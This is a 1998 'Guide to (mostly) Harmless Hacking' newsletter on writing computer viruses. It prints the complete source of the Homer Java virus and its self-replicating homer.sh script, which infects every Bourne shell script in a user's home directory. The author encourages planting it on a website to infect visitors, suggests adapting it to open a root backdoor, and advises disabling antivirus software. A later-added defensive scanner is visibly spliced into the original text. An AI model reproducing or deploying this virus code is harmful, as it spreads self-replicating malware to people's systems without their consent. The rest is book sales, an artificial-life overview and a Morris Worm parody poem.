Introduction to Computer Viruses 2

Warning: if you live in a country where information on how to write computer

viruses is illegal, please delete this email now!

___________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING



Vol. 3 No. 7, part 2



Introduction to Computer Viruses

____________________________________________________________



Part Two:



* How to write them

* How to write them and not get lynched

* Artificial life

* Virus humor

****************************************************************



How to Write Them



	Wait!  Wait!  This is supposed to be about mostly harmless hacking!  Is

Carolyn really going to tell all the newbies how to write computer viruses?

	Yes, I am.  I will tell you how to really write computer viruses, not just

use some lamer program like Virus Workshop that writes weak, helpless little

viruses for you. However, to use the information in this Guide you must know

how to compile Java or use assembly language.  If you can master these, you

probably have enough willingness to work hard that you will not abuse the

knowledge of how to code viruses.  At least that's my theory -- please don't

prove me wrong!

	Besides, the only way to fight dangerous viruses is to know exactly how to

write them.

	First, if you are like me, you may already be struggling with the

temptation to install a Java virus on your Web site to infect unwary

visitors.  Yes, I really am going to show you how to do this.  However, it

is a (mostly) harmless virus.  (Aw, darn!)



****************************************************************

You can go to jail warning:  This Guide only offers source code for a

(mostly) harmless virus.  However, some people are so terrified of and

ignorant about viruses that you just might get into big trouble if you

really put this Java virus on your Web page.  Suggestion: if you absolutely

cannot resist, how about putting it on a link with the flashing message

"Danger! Do not click here!  If you do, you might catch a virus!  Honest!!!

Would I lie to you?!!??"

****************************************************************



****************************************************************

You can get punched in the nose warning: Some people don't care if a virus

is (mostly) harmless or even entirely harmless.  These guys are terrified of

viruses.  If some guy who browses your Web site catches your virus and has a

fit and sues you or tracks you down and punches you in the nose, remember,

you asked for it.  Don't expect me to feel sorry for you.

*****************************************************************



	OK, folks, here it is, a Java virus.  The following source code for the

Homer virus is available on the floppy disk that accompanies "The Giant

Black Book of Computer Viruses" by Dr. Mark Ludwig:



/* Homer.java by Mark D. LaDue */



/* December 7, 1996 */



/*  Copyright (c) 1996 Mark D. LaDue

    You may study, use, modify, and distribute this example for any purpose.

    This example is provided WITHOUT WARRANTY either expressed or implied.  */



/* This Java application infects your UNIX system with a Bourne shell

   script virus, homer.sh.  homer.sh is kind enough to announce itself

   and inform you that "Java is safe, and UNIX viruses do not exist"

   before finding all of the Bourne shell scripts in your home directory,

   checking to see if they've already been infected, and infecting

   those that are not.  homer.sh infects another Bourne shell script

   by simply appending a working copy of itself to the end of that shell

   script.  */ 

    



import java.io.*;



class Homer {

    public static void main (String[] argv) {

    try {

        String userHome = System.getProperty("user.home");

        String target = "$HOME";

        FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh");

        String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +

        "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +

        "for file in `find " + target + " -type f -print`" + "\n" + "do" +

        "\n" + "    case \"`sed 1q $file`\" in" + "\n" +

        "        \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +

        " || sed -n '/#-_/,$p' $0 >> $file" + "\n" +

        "    esac" + "\n" + "done" + "\n" + 

        "2>/dev/null";

        byte[] buffer = new byte[homer.length()];

        homer.getBytes(0, homer.length(), buffer, 0);

        outer.write(buffer);

        outer.close();

        Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +

                        userHome + "/.homer.sh");

        Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +

                       "/.homer.sh");

        } catch (IOException ioe) {}

    }

}



	If you post this source code to your Web site -- it will do nothing!  That

is because this code must first be compiled in order to do its business.  If

you don't know how to compile Java source code for your Web page, you don't

know enough to safely handle viruses.

	Also, you need to put the code for the shell script, homer.sh, on your Web

site so this Java program can ship it to your victims.  Following is the

code for homer.sh:





#!/bin/sh



#-_



echo "Java is safe, and UNIX viruses do not exist."



for file in `find $HOME -type f -print`



do



    case "`sed 1q $file`" in



        "#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0

>> $file



    esac



done



	2>/dev/null



	In case you are wondering what this virus does -- it flashes a message on

the victim's screen reading "Java is safe, and UNIX viruses do not exist."

(For more information on how shell scripts work, see the GTMHHs on shell

programming.)

	Homer is a harmless, humorous shell virus.  However, it doesn't take a

genius to see how it could be given a destructive payload by modifying

homer.sh.  If someone were to be dumb enough to surf your booby-trapped

Website while logged in as root, it would be trivial to use a homer.sh

modified to give you a root shell with your very own back door.

	However, in general Java viruses are not terribly dangerous because they

run so slowly.  This gives their victims time to get suspicious and

terminate these programs.  Presumably a Java virus would take so long to

create a root shell and back door that the victim would kill the process in

time.
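
	On the defensive side, the same marker that homer.sh uses to skip files it has already infected makes infected scripts easy to find. The following is an added example, not part of the original Guide or of Mark LaDue's code: it lists Bourne shell scripts that carry the marker line and strips the appended copy, assuming the virus body is everything from the marker line to the end of the file. The function names, the script name homer_check.sh and the .homer-bak backup suffix are hypothetical.

```shell
#!/bin/sh
# Added example (not from the Guide): detect and repair Homer-marked scripts.
MARKER='#-_'         # marker line from the homer.sh listing
SHEBANG='#!/bin/sh'  # Homer only touches files whose first line is exactly this

# is_infected FILE: succeed if FILE starts with SHEBANG and has a line that
# is exactly MARKER. Homer itself greps for the substring; matching the whole
# line keeps this scanner (which mentions the marker) from flagging itself.
is_infected() {
    [ -f "$1" ] || return 1
    sed 1q "$1" 2>/dev/null | grep -q -x -F -e "$SHEBANG" || return 1
    grep -q -x -F -e "$MARKER" "$1"
}

# scan_homer DIR: print every infected script under DIR, one path per line.
# Paths with spaces are handled; paths containing newlines are not.
scan_homer() {
    find "$1" -type f -print 2>/dev/null | while IFS= read -r f; do
        if is_infected "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# clean_homer FILE: keep a copy as FILE.homer-bak, then delete everything
# from the first marker line to end of file. Assumption: nothing legitimate
# was added to the script after it was infected. Returns 1 if FILE is clean.
clean_homer() {
    is_infected "$1" || return 1
    cp -p "$1" "$1.homer-bak" || return 1
    sed "/^${MARKER}\$/,\$d" "$1.homer-bak" > "$1"
}

# make_sample DIR: constructed, inert sample files for trying the functions.
# The "infected" sample holds only the marker and the banner line, with no
# replication loop.
make_sample() {
    printf '#!/bin/sh\necho clean\n' > "$1/clean.sh"
    printf '#!/bin/sh\necho host\n#-_\necho "Java is safe, and UNIX viruses do not exist."\n' \
        > "$1/bad script.sh"
    printf 'notes mentioning #-_ in running text\n' > "$1/notes.txt"
}

# Usage (hypothetical script name): sh homer_check.sh scan DIR
#                                   sh homer_check.sh clean FILE
case "${1:-}" in
    scan)  scan_homer "${2:-$HOME}" ;;
    clean) clean_homer "$2" ;;
esac
```

	A scan of a home directory will also report the dropped copy, .homer.sh, since it starts with #!/bin/sh and carries the marker.  The .homer-bak copies still contain the appended code, so delete them once you have checked the repaired scripts.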



********************************************************************

Newbie note: Don't ever surf the Web while logged in as root. Don't ever try

to break into someone else's computer while logged in as root.  Any time you

are running as root, it is really easy for you to mess up your Unix

computer.  If you check out the phf abuse log at the Hacker Wargame section

of http://www.happyhacker.org, you will see that quite a few people have

tried to break into our webserver while running a Web browser and logged in

as root. 

********************************************************************



	The problem of some programs running really slowly is a major reason why

you can't do much as a virus or antivirus programmer unless you also learn

at least one assembly language.  Assembly language is fast!  No time for the

victim to react!  It also makes it easy for you to do complex and

infuriating things while a computer is only beginning to boot up.  For DOS

and Windows you will need an assembler for 80x86

(substitute 2, 3, 4, 5)/Pentium type computers.  Two of the best are

Microsoft Macro Assembler and Borland Turbo Assembler.  Places where you can

get them (you have to pay, they are not free) include

http://www.pparadise.com and http://www.supershops.com.

	If you are really serious about learning how to write viruses and

antiviruses, you may want to get the "Giant Black Book of Computer Viruses,

Second Edition," by Dr. Mark Ludwig.  Not only is he one of the world's

leading virus researchers -- he also is the only one I have discovered who

will tell you EXACTLY in almost endless detail how to write viruses and

antiviruses of many sorts.  However, this book is not for newbies.  He

assumes you already know a great deal about DOS, Windows and Unix, and are a

programmer.

	It comes with a floppy disk with source code for many viruses.  Here are

some hints for how to extract these viruses from this disk successfully and

without killing your computer.



1) This disk is designed to be installed from MS-DOS.  If you try to install

it from Windows, it will give you a runtime error.  If you don't know how to

work from MS-DOS, you aren't ready for this book.



2) The installation program for Dr. Ludwig's virus disk ought to activate

your antivirus program.  If it doesn't, your antivirus program is even more

worthless than most.  To be certain that you can succeed in installing a

directory full of viruses, deactivate your antivirus program(s) first.  If

this sounds too scary to you, don't buy this book! If you mess up your

computer by following my advice, too bad, that's what you get for playing

with viruses.



3) Here's what Dr. Ludwig's installation program will tell you:



                        ! ! W A R N I N G ! !



If you're like most computer users, you've grown used to being pampered.

That's a nice way of saying that software developers no longer expect you to

have a brain. Like a stupid monkey, all you need to do is put the CD in the

drive and let it auto-execute, or put the floppy disk in the drive and type

"setup".



If that's what you want and need, THEN DELETE THIS SOFTWARE OFF YOUR

COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER! We're really not

kidding about that. This disk is for thinking beings. Improperly used it

could be very dangerous. It could ruin your computer, your career and your

life. THAT IS NOT A JOKE.



DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW WHAT IT DOES.



DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED ENVIRONMENT.



	I suppose now you just can't resist buying this book.  Guess what -- you

can't get it in any bookstore.  They are all afraid of getting sued.  Also,

in some countries, mere possession of "The Giant Black Book of Computer

Viruses" is illegal.  Just to be safe, you might want to delete this GTMHH

right now and only read it from our Web site at http://www.happyhacker.org.

	If you are absolutely determined to get this book, within the US you can

order it from American Eagle Publications by phoning toll free 800-719-4957;

outside the US you can order it by calling (insert country code here)

520-367-1621.  It costs $39.95.  This price includes the floppy disk with

all that stuff that upsets your antivirus program.  Shipping and handling

costs are extra.

	If you live within the US, you can also buy "The Giant Black Book of

Computer Viruses" by sending $44.95 (this includes shipping by Priority

mail, which is supposed to take two days) made out to M/B Research, PO Box

1520, Cedar Crest NM 87008.  That's my company.  Sorry, I'm not going to

ship the book outside the US because I don't know in which countries it is

illegal.  I would feel really bad if you were to go to your post office to

pick up the book and instead got picked up by the police.  

	American Eagle can get the book to you at the lowest shipping cost, if you

don't mind it taking a long time to get to you.  I can get it to you faster,

but it costs you more for the shipping.

	If you want to buy "The Giant Black Book of Computer Viruses" with a credit

card over the Internet, check out http://www.amazon.com and

http://www.infowar.com.  Amazon.com will usually take much longer to get the

book to you than any other book seller, however.

	

How to Write Viruses and Not Get Lynched

	

	Just imagine how people will react when you are at some party full of

ambitious young professionals.  Everyone is trading business cards.  You

hand out ones that say "George the Doomster.  Computer virus design.  Free

samples, muhahaha."  You'll be real popular, yes sirree!

	OK, so you only plan on writing harmless viruses.  Try to tell that to the

lynch mob that may pay you a visit when they discover it was you who wrote

the code that made their Win95 computers come down with habitual General

Protection Faults.  Remember, even the virus designer who has the best of

intentions may write a seemingly harmless or even beneficial virus that

turns out to have a bug in the code that accidentally does harm.  Also,

since the best viruses are memory resident (they hide in RAM memory) they

really can help create General Protection Faults just by hogging too much

memory.

	Besides, people like to pick and choose what programs run on their

computers.  Imagine that!  If you design a virus so it will sneak into

computers, don't expect people to thank you and admire you.  If you do

choose to code a virus, please consider coding politeness into it.  You

could have it ask permission to take up residence on each new computer and

leave when asked.  Shoot, if I could find a copy of that virus that makes a

mirror image of Windows desktop graphics each Saturday, and if I knew how to

uninstall it without paying a bunch of money to Panda Software, I'd enjoy

sharing my computer with it.



Artificial Life



	Now that you understand the basic principles of virus coding, let's take a

look at the Big Time: using your programming talents to create -- or battle

against -- artificial life.

	Just what is artificial life (insiders call it "alife"), anyhow? According

to the most prominent researcher in this field, Dr. Chris Langton,

artificial life is "... the study of man-made systems that exhibit

behaviours characteristic of natural living systems." -- "Artificial Life,"

edited by Chris Langton, Addison-Wesley, 1988.  You can get this book from

http://www.amazon.com.

	There are three primary forms of alife.  Some alife is growing -- or trying

to grow -- in test tubes full of RNA (ribonucleic acid) or other chemicals.

The second major form of alife consists of computerized robots which their

creators hope will someday achieve the ability to adapt and reproduce

without human assistance.  The third type of alife is computer programs that

exist, adapt, reproduce and evolve in the virtual landscape of cyberspace --

what we know as computer viruses.  

	Of all the forms of artificial life, computer viruses are the only ones so

far that reproduce, escape the laboratory and take up life in the wild.

Viruses that follow rules of good behavior -- only living in computers when

invited -- are often created by alife researchers.

	How can you meet and get involved with alife designers?

Http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/ offer

listings of upcoming conferences on this topic from around the world.

Closely related to artificial life is the Berkeley Initiative in Soft

Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc.  If you want

to volunteer to harbor artificial life viruses on your computer or LAN, you

can probably find a researcher at one of these sites who would be happy to

give you some of his or her harmless (you hope) creations.

	American Eagle also sells a book "Computer Viruses, Artificial Life and

Evolution" by Dr. Ludwig (American Eagle, 1993).  It costs $26.95 and is

almost impossible to get unless you order it directly from American Eagle.



Virus Humor



	As we end this Guide, please remember that with the right attitude, viruses

actually can be fun!  Next time your computer gets infected by one, just

remember, don't worry, be happy.  Following is some virus humor to show how

other people have coped cheerfully with an encounter with this pesky new

life form.



                       "The Worm Before Christmas"

                            by Clement C. Morris



            (a.k.a. David Bradley, Betty Cheng, Hal Render,

                        Greg Rogers, and Dan LaLiberte)



        'Twas the night before finals, and all through the lab

        Not a student was sleeping, not even McNabb.

        Their projects were finished, completed with care

        In hopes that the grades would be easy (and fair).



        The students were wired with caffeine in their veins

        While visions of quals nearly drove them insane.

        With piles of books and a brand new highlighter,

        I had just settled down for another all nighter ---



        When out from our gateways arose such a clatter,

        I sprang from my desk to see what was the matter;

        Away to the console I flew like a flash,

        And logged in as root to fend off a crash.



        The windows displayed on my brand new Sun-3,

        Gave oodles of info --- some in 3-D.

        When, what to my burning red eyes should appear

        But dozens of "nobody" jobs.  Oh dear!



        With a blitzkrieg invasion, so virulent and firm,

        I knew in a moment, it was Morris's Worm!

        More rapid than eagles his processes came,

        And they forked and exec'ed and they copied by name:



        "Now Dasher!  Now Dancer!  Now, Prancer and Vixen!

        On Comet!  On Cupid!  On Donner and Blitzen!

        To the sites in .rhosts and host.equiv

        Now, dash away!  dash away!  dash away all!"



        And then in a twinkling, I heard on the phone,

        The complaints of the users.  (Thought I was alone!)

        "The load is too high!"  "I can't read my files!"

        "I can't send my mail over miles and miles!"



        I unplugged the net, and was turning around,

        When the worm-ridden system went down with a bound.

        I fretted.  I frittered.  I sweated.  I wept.

        Then finally I core dumped the worm in /tmp.



        It was smart and pervasive, a right jolly old stealth,

        And I laughed, when I saw it, in spite of myself.

        A look at the dump of that invasive thread

        Soon gave me to know we had nothing to dread.



        The next day was slow with no network connections,

        For we wanted no more of those pesky infections.

        But in spite of the news and the noise and the clatter,

        Soon all became normal, as if naught were the matter.



        Then later that month while all were away,

        A virus came calling and then went away.

        The system then told us, when we logged in one night:

        "Happy Christmas to all!  (You guys aren't so bright.)"



        [ Note:  The machines dasher.cs.uiuc.edu,

          dancer.cs.uiuc.ed, prancer.cs.uiuc.edu, etc. have

          been renamed deer1, deer2, deer3, etc. so as not

          to confuse the already burdened students who use

          those machines. We regret that this poem reflects

          the older naming scheme and hope it does not confuse

          the network administrator at your site.  -Ed.]

_______________________________________________________________________

Where are those back issues of GTMHHs and Happy Hacker Digests? Check out

the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the

kind that led to the creation of the Internet and a new era of freedom of

information. So don't email us about any crimes you have committed!  And

don't expect us to come to your rescue if you crash 100 million computers

with some new Java virus you just unleashed.

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless

Hacking, please email hacker@techbroker.com with message "subscribe

happy-hacker" in the body of your message. 

Copyright 1998 Carolyn P. Meinel. You may forward,

print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site

as long as you leave this notice at the end.

_________________________________________________________

Carolyn Meinel

M/B Research -- The Technology Brokers

http://techbroker.com
